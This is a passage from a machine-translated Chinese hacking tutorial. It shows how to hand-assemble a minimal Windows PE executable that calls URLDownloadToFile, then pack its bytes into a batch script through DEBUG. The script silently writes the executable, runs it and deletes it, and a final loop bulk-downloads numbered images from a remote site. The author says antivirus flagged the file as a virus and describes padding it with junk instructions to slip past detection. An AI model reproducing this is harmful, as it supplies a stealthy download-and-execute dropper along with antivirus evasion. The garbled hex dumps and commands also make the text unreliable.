V. Solve - to create [this is jmp s2]
Now let's go back to organize the whole process ... combine this table:
Code
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F00000000 4D 5A 5B 00 00 00 00 00 00 00 00 00 00 00 00 00 MZ [............. 00000010 00 00 00 00 00 00 00 00 0,000,000,000,000,000 ................ 00000020 0,000,000,000,000,000 0,000,000,000,000,000 .. .............. 000000 聽 00 00 00 00 00 00 00 00 00 00 ...........] @ ... 0000000040 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 PE..L ........... 00000050 00 00 00 00 70 00 0F 01 0B 01 00 00 00 02 00 00 .... p ........... 00000060 00 00 00 00 00 00 00 00 79 01 00 00 00 00 00 00 ........ y ....... 00000070 00 00 00 00 00 00 40 00 0,010,000,000,020,000 ...... @ ......... 00000080 0,000,000,000,000,000 0,400,000,000,000,000 ..... ........... 00000090 00 30 00 00 00 02 00 00 00 00 00 00 02 00 00 00 .0 .............. 000000A0 00 01 00 00 00 00 00 00 00 01 00 00 00 10 00 00 ................ 000000B0 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ...... ........ 00000 0c0 28 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 ............ `..`000000F0 00 00 00 00 00 00 00 00 00 | .............. 0000110 00 00 00 00 00 00 00 00 00 00 00 .... `..`
........ 00000120 58 11 00 00 00 00 00 00 50 11 00 00 00 00 00 00 X ....... P ....... 00000130 00 00 00 00 6E 11 00 00 20 11 00 00 00 00 00 ... n ....... 0000140 00 00 00 00 00 00 00 00 00 ............... ...... 00000150 58 11 00 00 00 00 00 00 5B 00 00 00 00 00 00 00 ........ [....... 00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0000 00 00 00 00 00 00 00 ........... .. 00 00 00 00 ... .... 000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............. ... 000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0000 00 00 00 00 00 00 5d ........................................................................................................................................................................................................................................................... This PE file data is a large "fill in", which removes the important data part, and we can write to data from the data (the middle of the two large registration hangs).
The first is starting from the address 00000002 to the 56-byte of the address 0000003b.
The second is 160 bytes starting from the address 00000160 to the PE file. (You can also start from 000000158, there is 168 bytes)
Because our procedure is short, the second 168 bytes can basically meet all, do not need the first 56-byte data. Put the data and more convenient, isn't it? ^ _ ^.
What do these places fill in something? It is roughly divided into three parts:
1. Import table, including the string of "URLDownloadTofile" function of "URLMON.DLL" DLL.
2. Document executor code.
3. The data required for functions.
The first is the import table. According to the previous section, we can easily determine this "urldownloadtofile" to fill in "58 11 00 00". Of course, you can change this value, this value is just what I wrote. In short, what is the location of this import table, this "58 11 00 00" is to point to this position. So we write "31 00 URLDOWNLOADTOFILE" strings on the 00000158 position of the PE file, the front two 16 in front is The serial number is a basis for providing information to the support as a basis for exporting the address in the DLL.
(Right, here explain, this document also comments a lot of "attention", why, take a closer look, discovery is related to the location, that is because:: PE files The address is the address in the memory. In this way, the loading speed is accelerated, and there is also a lot of loaders, such as this "58 11 00 00" address, because we load The location is 1000h, so according to this position, our location in the file is 158h, this is noticeable here, not all the addresses can be calculated, because we set up 100 hours there in PointertorawData, which is so convenient Calculate the relative address, for other PE files, if you want to calculate the PE file address according to this memory address, it is not as simple as things, ^ _ ^ .. Of course, there are many such conversion functions, RVA to offset. ) Then fill the URLMON.DLL of this string into the address pointing to "6e 11 00 00", of course, this value can also be changed.
Finally, we have to record the store of the address that is finally exported by the pen, that is, "20 11 00 00".
[Note that these operations are related to the image_import_descriptor structure and the image_thunk_data32 structure, do not understand the two structures]
Next is the executable code. Our purpose is very simple, as long as this PE file can download the file, we only need to call the URLDOWNLOADTOFILE function, write a small assembly code (Remember the calling method of URLDownloadTofile before, flower The one of the pen ink):
Code
PUSH 0; 6A 00PUSH 0; 6A 00PUSH XXXXXXXX; 68 xxxxxxxpush xxxxxxxx; 68 xxxxxxxpush 0; 6A 00call xxxxxxxx; e8 xxxxxxxx
Since the call is compliant with the pASCAL call, it is stdcall, sprayed from the right to left, so our parameters are the last stack. Final call out this URLDOWNLOADTOFILE function.
The first two xxxxxxxx addresses are the two strings of the address, that is, two important parameters of the URLDownloadTofile function, the last xxxxxxxx is the address in the memory (the operating system has been fill us, remember the one mentioned above "20 11 00 00" of the written record?)
The main code is so much, but the unfortunate thing happens. When I use WinHex to fill this code in the PE framework and save it, I am deleted by the anti-virus software !!!! They take this as a virus ????? I want to write a virus to be such a very easy thing (..... one _ one.) ....
Fortunately, there is backup (if not, I have to cry .....), I have modified these code, add some garbage (such as Mov Eax, 1) ... The final finished code is:
Code
B8 01000000; MOV EAX, 16A 00; Push 06A 00; Push 068 D0114000; PUSH D0114000; Pointing to the location of the local path string you save, this article is "C: //g1123//00204.jpg", pay attention to the parallel bars .68 a0114000; Push A0114000; point to the location of the URL string to be downloaded 6A 00; PUSH 0E8 02000000; Call 02000000; also the address of the two bytes of the call, which is the usual practice of the function of the machine C9; Leavec3 RETFF25 20114000; JMP 20114000; This jump address is "20 11 00 00", as for that "40",; is the program's recommended start load address "00400000". In addition, here is the imitation machine format .00000000
Where is it written? This will be casually, but please turn over the above saying, there is an address is (that is, pay attention 1 location) AddressofentryPoint: This is used to locate your code to perform the entrance, we will Behind the import table, that is, "00000179H" position. The last is the address of the two strings, we have already given in the program.
Code
68 d011400068 a0114000
Then the position of these two strings is determined, one is "000001D0H", the file address we want to download "/Article/uploadFiles/200408/20040818230017329.jpg" is saved here .. Here I assign 48 words In the storage area, you can also set it according to the specific needs. Don't forget that there is also the DOS header can save 56-bytes of blank can write data. If necessary, the modification points is.
For this pile of nonsense, my purpose is to let everyone understand, and intentionally introduced the format, that is, if you let you do other API functions, it can be easily called, not limit to urldownloadtofile. ^ _ _ ^ ... such as those ... those ... feature .... (I haven't said ... 嘿嘿) ..
OK, this PE file last forming PE framework is like this:
Code
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F00000000 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 MZ .............. 00000010 00 00 00 00 00 00 00 00 0,000,000,000,000,000 ................ 00000020 0,000,000,000,000,000 0,000,000,000,000,000 .. .............. 00000030 0,000,000,000,000,000 0,000,000,040,000,000 ............ @ ... 000000405045 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 PE..L ........... 00000050 00 00 00 00 70 00 0F 01 0B 01 00 00 00 02 00 00 .... p ........... 00000060 00 00 00 00 00 00 00 00 79 01 00 00 00 00 00 00 ........ y ....... 00000070 00 00 00 00 00 00 40 00 0,010,000,000,020,000 ...... @ ......... 00000080 0,000,000,000,000,000 0,400,000,000,000,000 ..... ........... 00000090 00 30 00 00 00 02 00 00 00 00 00 00 02 00 00 00 .0 .............. 000000A0 00 01 00 00 00 00 00 00 00 01 00 00 00 10 00 00 ................ 000000B0 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ...... ........ 00000 0c0 28 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 ............ `..`000000F0 00 00 00 00 00 00 00 00 00 | .............. 0000110 00 00 00 00 00 00 00 00 00 00 00 .... `..`
........ 00000120 58 11 00 00 00 00 00 00 50 11 00 00 00 00 00 00 X ....... P ....... 00000130 00 00 00 00 6E 11 00 00 20 11 00 00 00 00 00 ... n ....... 0000140 00 00 00 00 00 00 00 00 00 ............... ... 00 00 00 00 00 00 00 55 52 4C 44 6F 77 x ....... 1.urdow00000160 6e 6C 6F 61 64 54 6F 46 69 6C 65 41 00 00 75 72 NLoadTofilea..ur00000170 6C 6D 6F 6E 2e 64 6C 6C 00 B8 01 00 00 6A 00 00 d1 00 68 D0 11 40 00 68 A0 11 40 00 6A 00 E8 02 JH? @ .h? @. J.?00000190 00 00 00 c9 c3 ff 25 20 11 40 00 00 00 00 00 ... %. @ ... 000001A0 68 74 74 70 3A 2F 2F 77 77 77 2E 73 65 72 67 65 http://www.Serge000001B0 61 75 72 61 2E 6e 65 74 2F 54 47 50 2F 30 30 32 aura.net/tgp/002000001C0 2F 69 6D 61 67 65 73 2F 30 34 2E 6A 70 67 00 00 /images/04.jpg..000001D0 43 3A 5C 5C 47 4C 31 32 33 5C 5C 30 30 32 30 34 C: // GL123 // 00204000001E0 2E 4A 50 47 00 00 00 00 00 00 00 00 00 00 00 00 .Jpg ... Take this PE file, the picture has been downloaded to the GL123 folder of the C disk, indicating that our work is still successful. (Wow, good SEX MM, mouth water flowing .....)
6. packaging
Start here, our EXE is there, now starting debug, our plan is to write the entire PE file data with the E command, and then save this original bat file with the W command, so this original BAT file:
Code
; Echo off; DEBUG <% ~ s0> nul2> nul; GOTO BEGINE 100 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00E 110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............ RCX200N E: /TMP/TMP99.TMPWQ: Beginrename E: /TMP/TMP99.TMP TMP99.EXE> NUL2> NULCALL E: / TMP / TMP99.EXEDEL E: /TMP/TMP99.EXE> NUL2> NUL
But this is very unhappy ... so I thought I had an option to optimize it, and I fill 512 00 with the F command, and then write the data required in the relative position, so I generated the BATE1 version of the download BAT script, this Is it a complete batch of Zhenzhai?
Code
Echo Off; debug <% ~ s0> NUL2> NUL; GOTO BEGINE 100 4D 5AF 102 2FF 00E 13C 40 00 00 50 45 00 00 01 02E 154 70 00 02E 168 79 01E 176 40 00 00 10 00 00 00 02E 188 04 00 00 00 00 00 00 00 00 30 00 00 00 02E 19C 02 00 00 00 00 01E 1A9 01 00 00 00 10 00 00 00 00 00 00 02E 1C0 28 11 00 00 28 E 1D1 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00- 20 11e 250 58 11 00 00 00 00 31 00 55 52 4C 44 6F 77E 260 6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 00 75 72e 270 6C 6D 6F 6E 2E 64 6C 6C 00 B8 01 00 00 00 00 00 6A 00E 280 6A 00 68 D0 11 40 00 68 A0 11 40 00 6A 00 E8 02E 293 C9 C3 FF 25 20 11 40E 2A0 "/Article/uploadFiles/200408/20040818230026641.jpg "E 2D0" C: // GL123 / / 00204.jpg "RCX200N E: /TMP/TMP99.TMPWQ: Beginrename E: /TMP/TMP99.TMP TMP99.EXE> NUL2> NULCALL E: /TMP/TMP99.EXEDEL E: /TMP/TMP99.EXE> NUL2> NUL running this BAT, after a fast flash screen, the picture was downloaded to my hard disk after a flash screen .... Gao Jong is coming ..
This document is all about it. It has all been finished. Use this batch document to achieve any download on the network, but what should be paid attention to, download the length of the URL of the address, if you feel very long So to adjust the PE format to achieve the purpose of compatibility with your URL length, save the address is basically the same as the URL.
Seven.
If this is ended, most people have no opinions. Unfortunately, this document is not complete ... In order to make this recorded document more complete, I use the download MM event to make an example, to demonstrate how to use it This BAT implements the function of bulk download, as a section on this document, to comfort the diligent eyes. (... ^ _ ^)
First give the entire batch code:
Code
Echo OffsetLocalcD / CD% ~ D0% ~ P0MKDIR TMP> NUL 2> Nulmkdir C: / GL123> NUL 2> Nulset SztempFile = TMP99SET SZTEMPPATH =% ~ D0% ~ P0TMPECHO @eclo off> GF.BATECHO setLocal >> GF.BATECHO CD />>>> GF.BATECHO CD %% ^ ~ d0 %% ^ ~ P0 >> GF.BATecho set szurlfolder = 00 %% 1 >> GF.BATECHO SET SZURLFOLDER = %% SZURLFOLDER: ^ ~ -3 %% >> GF . batecho set szurlfile = 0 %% 2 >> GF.BATECHO SET SZURLFILE = %% SZURLFILE: ^ ~ -2 %% >> GF.BATECHO SET SZURLGETFILE = / Article / UploadFiles / 200408 / 20040818230035743.jpg >> GF.BATECHO Set szlocalfile = c: //g1123//%%Szurlfolder%%%%Szurlfile%%.jpg >> gf.batecho echo; echo off ^> DL.BAT >> GF.BATECHO ECHO; Debug ^^^^ <%% %% ^^^ ~ S0 ^^^> NUL2 ^^^> NUL ^> ^> DL.BAT >> GF.BATECHO Echo; Goto Run ^> ^> DL.BAT >> GF.BATECHO ECHO E 100 4D 5A ^> ^> dl.bat >> GF.BATECHO ECHO F 102 2ff 00 ^> ^> DL.BAT >> GF.BATECHECHO ECHO E 13C 40 00 00 50 45 00 00 4c 01 02 ^> ^> DL.bat >> GF.BATECHO ECHO E 154 70 00 0F 01 0B 01 00 00 02 ^> ^> DL.BAT >> GF.BATECHECHO ECHO E 168 79 01 ^> ^> DL.BAT >> GF.BATECHO Echo E 176 40 00 00 10 00 00 00 02 ^> ^> DL.BAT >> GF.BATECHO ECHO E 188 04 00 00 00 00 00 00 30 0 0 00 00 02 ^> ^> dl.bat >> gf.batecho ECHO E 19C 02 00 00 00 00 01 ^> ^> dl.bat >> gf.batecho ECHO E 1A9 01 00 00 00 10 00 00 00 00 00 00 02 ^> ^> DL.BAT >> GF.BATECHO ECHO E 1C0 28 11 00 00 28 ^> ^> DL.BAT >> GF.BATECHO ECHO E 1D1 02 00 00 10 00 00 00 00 00 00 00 01 ^> ^> DL.BAT >> GF.BATECHO ECHO E 1EC 60 00 00 60 ^> ^> DL.BAT >> GF.BATECHO ECHO E 1F8 02 00 00 00 00 00 00 02 ^> ^> DL. BAT >> GF.BATECHO ECHO E 214 60 00 00 60 ^> ^> DL.BAT >>
GF.BATECHO ECHO E 220 58 11 00 00 00 00 50 11 ^> ^> DL.BAT >> GF.BATECHO Echo E 234 6e 11 00 00 20 11 ^> ^> DL.BAT >> GF.BATECHO ECHO E 250 58 11 00 00 00 00 31 00 55 52 4C 44 6F 77 ^> ^> DL.BAT >> GF.BATECHO ECHO E 260 6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 75 72 ^ > ^> DL.BAT >> GF.BATECHO ECHO E 270 6C 6D 6F 6E 2E 64 6C 6C 00 B8 01 00 00 6A 00 ^> ^> DL.BAT >> GF.BATECHO ECHO E 280 6A 00 68 D0 11 40 00 68 A0 11 40 00 6A 00 E8 02 ^> ^> DL.BAT >> GF.BATECHO ECHO E 293 C9 C3 FF 25 20 11 40 ^> ^> DL.BAT >> GF.BATECHO ECHO E 2A0 "% % szurlgetfile %% "^> ^> DL.BAT >> GF.BATECHO ECHO E 2D0" %% SZLOCALFILE %% "^> ^> DL.BAT >> GF.BATECHO ECHO RCX ^> ^> DL.BAT >> GF.BATECHO ECHO 200 ^> ^> DL.BAT >> GF.BATECHO ECHO N% SZTEMPPATH% /% sztempfile% .tmp ^> ^> DL.BAT >> GF.BATECHO ECHO W ^> ^> DL.BAT> > gf.batecho echo q ^> ^> DL.BAT >> GF.BATECHO Echo: Run ^> ^> DL.BAT >> GF.BATECHO Echo rename% Sztemppath% /% sztempFile% .tmp% sztempfile% .exe ^ ^^> NUL2 ^^^> NUL ^> ^> DL.BAT >> GF.BATECHO Echo call% sztemppath% /% sztempfile% .exe ^> ^> DL.BAT >> GF.BATECHO ECHO DEL% SZTEMPPP path% / % SZ Tempfile% .exe ^^^> NUL2 ^^^> NUL ^> ^> DL.BAT >> GF.BATECHO Echo Download %% SzurlgetFile %% == ^^^> %% SzlocalFile %% >> GF.BATECHO CALL Dl.bat >> GF.BATECHO Echo ... ok! >> gf.batecho endlocal >> gf.bat: echo @echo on >> GF.BATFOR / L %% I in (1, 1, 162) Do FOR / L %% J IN (1, 12) Do Call GF.BAT %% I %% JDEL GF.BAT> NUL 2> Nuldel DL.BAT> NUL 2> Nulrmdir TMP> NUL 2> NUL Echo All Ok! endlocalecho on If you understand the previous one as a batch code, this is basically no problem.
This batch work steps:
1. After running, create a "GL123" folder in your C drive, used to save the downloaded picture (this is also the only shortcomings, I can't write into custom folders ... :() 2. The current directory sent two sub-batch files and a "TMP" temporary directory ...
3. After the start loop download all the pictures, display the progress, and then display "all ok".
4. Delete all temporary files.
For some places in this BAT, I will explain:
1.RCX is the write register cx command of debug, assigns the file size we want to write to him, then call the n command to give the file name and write it or L loading,
2.Q will keep the bus back (you don't want the bat file to come back ...),
3.> NUL and 2> NUL is to put all the output and error output ... You don't want to appear "1 file (s) copy .." when downloading .. "
4. If it is a special character, you want to write a file with the "^" symbol of the escape.
5. For the address of the file address increment type, such as http: //www.xxx.com/0001.jpg, http://www.xxx.com/0002.jpg ... This format, Many people use this value to be less than 9, plus three 0, greater than 9, less than 99, add 2 0, greater than 99, less than 999, add three 0 ..... and my method is unified This value plus enough 0, and then intercepts the last 4 digits of the entire string, relatively save the provincial code.
6.FOR can be nested, constitute a N-repetition, but there is a disadvantage, I can use set ... (specifically help, in short, I am very trouble ... One _ one .. this is also a multiple BAT Reason for realization)
7. It is best to enter the current directory before processing the file section (including the new and deleted directory). This batch is completed with CD / and CD% ~ D0% ~ P0.
8.% to D0 environment variable in CD% ~ D0% to P0 is an extension to% 0 variables, extended to the current drive letter,% ~ P0 is an extension to the current directory, others look at the Window command line help documentation.
9. Develop a habit to wrap the entire batch with setlocal and endlocal.
10. Because the local string is saved in the memory, in the batch, it is saved in the batch bar. To implement this conversion, it must be quite a few code (batches to the text of the text is extremely weak ... _1.), so I have not written.
Eight.
In fact, the title of this article can be changed to: Calling the API with batch, but I feel that it is too much to find things. After all, call the API or write the program. In addition, in order to send this document, it has added considerable PE format analysis. Although there is a little relationship with this article ... but still feel a bit 宾 ...
After completing these features, how hard is the person who works in the underlying work ... I want to write the program with VC, this is already a very happy four child ... ( When I said that ZV secretly took out the little hand and wipe it .... I have to be a master! I have to endure others can't endure, so ZV is on the arm with the cigarette .... Sweat, it is very painful, of course, there is no ~ ~~ haha) ..
The two main tools used in the article are the old seniors in Microsoft. I don't see them in a long time. It is also a nostalgic for these fast forgotten technology (it is said that the WPS under UCDOS is a cow. Using Debug, PF is tight, one _ one ...), in fact, the windows is not open, it is still very interesting, huh, huh.
Finally, in this lengthy, bloated, inclusion, no number of errors, garbage, plagiarism, confused, evil, the language is unlocked, and there is a personal blood, thank you for spending so much time. Here, if you think that there is something a little gain, you will have a post for me, or you write a "hard", it is also a little comfort to me .. ^ _ ^ ..
Nine. Reference
<< do all in cmd shell >> - zZZEVAZZZ (EVA is really pitiful, I found more author of this document "to find him writing ... One _ one.)
<< Handmade micro Win32 executable >> - Watercloud
<< ICZelion's PE Tutorial >> - ICZelion
<< A Tour of the Win32 Portable Executable File Format >> - MSDN There are some scattered BAT and DEBUG usage, which is the acquisition of Baidu and Google.
Full text.